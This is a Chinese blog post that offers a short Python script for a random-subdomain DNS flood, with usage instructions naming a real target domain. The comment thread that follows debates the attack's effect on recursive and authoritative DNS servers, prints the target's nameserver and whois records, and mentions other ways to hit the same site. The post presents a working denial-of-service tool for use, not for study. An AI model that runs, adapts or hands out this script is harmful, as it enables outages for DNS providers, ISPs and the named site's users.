DNS攻击小程序

      4 Comments on DNS攻击小程序

这个不是DNS放大攻击,而是攻击DNS根服务器。
风险自担。
使用:

python dnsattack.py moejn.com 5 5 (10)

python dnsattack.py 根域名 查询(攻击)次数 线程数 (生成长度,可不填)

#!/usr/bin/env python
#coding:utf-8
# Author:  Beining --<>
# Purpose: A most easy DNS attacker
# Created: 01/15/2015
import os
import sys
import unittest
import socket
from random import randint
from multiprocessing.dummy import Pool as ThreadPool
#----------------------------------------------------------------------
def resolve_ip(address):
    """"""
    try:
        socket.getaddrinfo(address, 80, 0, 0, socket.SOL_TCP)
    except:
        pass
#----------------------------------------------------------------------
def main(address, time, length, thread_num):
    """"""
    domain_list = [''.join(map(lambda xx:(hex(ord(xx))[2:]),os.urandom(int(length)))) + '.' + str(address) for i in range(int(time))]
    pool = ThreadPool(int(thread_num))
    results = pool.map(resolve_ip, domain_list)
    #close the pool and wait for the work to finish
    pool.close()
    pool.join()
#----------------------------------------------------------------------
if __name__=='__main__':
    address = str(sys.argv[1])
    time = int(sys.argv[2])
    thread_num = int(sys.argv[3])
    try:
        length = int(sys.argv[4])
    except:
        length = randint(6, 32)
    print('Start!')
    main(address, time, length, thread_num)
    print('Done!')

 

4 thoughts on “DNS攻击小程序

  1. StarBrilliant

    1、受伤害的是ISP的DNS服务器而不是艦国的服务器。应该去D它的NS,而那是DNSPod估计D不动。
    2、用多线程自己的电脑一定会比对方先挂。
    总结,D人家的DNS无效。

    Reply
    1. Beining Post author

      0. 请看新版。
      1. 都受伤。具体见DNS递归解析原理。
      1)他是新网。
      2)当然D不动了,Flood骨干网服务器?那我得买几个机房过来打。(要是那样我就直接故意route泄露了,这不比朝鲜那点小网络战来的爽?)
      2. 你得读代码。
      我没有任何请求直接打到他的NS上去,一切走递归。
      只是加了个反射,而我的目标不是反射。
      反射攻击不是这么玩的,这个反射太好洗,而且倍数太小了。
      首先,他不能停解析。
      其次,他不能回任何数据,回了这个测试的目的就达到了。
      然后,他不能只对存在的解析回数据。因为还是要吃CPU。
      这可不是小打小闹,14年12月10日的全国断网就是这个办法。而我这个比那个还给力。
      找点机器跑一次?

      Reply
      1. StarBrilliant

        没注意到子域名,你好像是随机生成了子域名吧。
        1、他是 DNSPod,证据 1(dig NS):

        ;; QUESTION SECTION:
        ;moejn.com. IN NS
        ;; ANSWER SECTION:
        moejn.com. 600 IN NS f1g1ns2.dnspod.net.
        moejn.com. 600 IN NS f1g1ns1.dnspod.net.

        证据 2(whois 的 Name Server 记录):

        Domain Name: MOEJN.COM
        Registrar: HICHINA ZHICHENG TECHNOLOGY LTD.
        Sponsoring Registrar IANA ID: 420
        Whois Server: grs-whois.hichina.com
        Referral URL: http://www.net.cn
        Name Server: F1G1NS1.DNSPOD.NET
        Name Server: F1G1NS2.DNSPOD.NET
        Status: ok
        Updated Date: 16-jan-2015
        Creation Date: 30-oct-2014
        Expiration Date: 30-oct-2015

        2、新版代码我已经读了,大概是让 DNS 回复到 DNS 机器上?
        3、既然刚刚已经说了是 DNSPod(退一万步就算是万网自带的简易解析器),也是能抗住 DNS 反射攻击的
        4、2014年12月10日的全国断网是因为根服务器被某墙投毒,而 TTL 设置了 24 小时导致的。本身投毒不是问题,问题是那次用了主路投毒(以前是旁路投毒),而且设了一个很长的 TTL 而导致即使根服务器刷新了缓存,下属服务器还没有刷新。而这次事件最大的危害也只是 24 小时 TTL。
        5、目前对舰国效果最大的攻击还是数据库和验证码。数据库是 CDN 不能保护的,而验证码那个 bug 有很高的安全隐患。
        6、舰国的最后判定还得等咔多咔瓦手电筒,现在「70萬出せば、君のものに」已经在11区屠版了。我觉得舰国到死也不远了,不过我还是希望能早日引进正版国服。

        Reply
        1. Beining Post author

          对。
          1. 我whois太老?
          2.是。
          3. 不是反射。
          反射是我弄个4K的记录,构造包打过去。这个明显不是。
          而且放大倍数很低的。
          4.不是一次。
          GFW那次是GFW。
          我说的是,有一次揍instagram follower网站,把他的权威DNS打垮了。
          5. 他就是弄一堆小孩拿LOIC和HOIC轰。orz啊。
          6. 我们做好我们自己吧。。。

          Reply

Leave a Reply

Your email address will not be published.